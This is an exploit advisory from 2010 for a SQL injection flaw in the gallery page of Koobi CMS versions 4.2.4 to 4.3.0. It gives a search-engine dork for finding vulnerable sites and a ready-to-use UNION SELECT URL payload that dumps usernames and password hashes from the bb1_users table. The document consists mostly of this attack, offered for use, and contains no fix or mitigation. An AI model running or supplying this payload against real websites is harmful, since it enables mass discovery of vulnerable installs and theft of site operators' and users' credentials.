Koobi CMS (index.php) SQL Injection Vulnerability

# Ariko-Security: Security Audits , Audyt bezpieczenstwa
# Advisory: 711/2010

=====================================================
Koobi CMS (index.php) SQL Injection Vulnerability
=====================================================

____ ______ __ __ __ __ ____ ______ _____
/\ _`\ /\__ _\ /\ \ /'__`\ /\ \/\ \/\ _`\ /\__ _\ /\ __`\
\ \,\L\_\/_/\ \/ \ \ \ /\_\L\ \\ \ `\\ \ \ \/\_\/_/\ \/ \ \ \/\ \
\/_\__ \ \ \ \ \ \ \ __\/_/_\_<_\ \ , ` \ \ \/_/_ \ \ \ \ \ \ \ \
/\ \L\ \ \_\ \__\ \ \L\ \ /\ \L\ \\ \ \`\ \ \ \L\ \ \_\ \__\ \ \_\ \
\ `\____\/\_____\\ \____/ \ \____/ \ \_\ \_\ \____/ /\_____\\ \_____\
\/_____/\/_____/ \/___/ \/___/ \/_/\/_/\/___/ \/_____/ \/_____/

# Exploit Title : Koobi CMS (index.php) SQL Injection Vulnerability

# Date : July 12 2010

# Author : SIL3NCIO

# Email : 617a6572@gmail.com

# Version: 4.3.0 & 4.2.5 & 4.2.4 Maybe Higher Versions are affected too

# Tested on: Win Xp Sp3

# Dork : inurl:"index.php?p=gallerypic img_id"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Exploit~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[Exploit] : http://site.com/path/index.php?p=gallerypic&img_id=[SQLi]

-188+union+select+1,2,3,group_concat(username,0x3a,password),5,6,7,8,9+from+bb1_users--

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Note : Proud to be Tunisian

[wrass la7nina sa7li]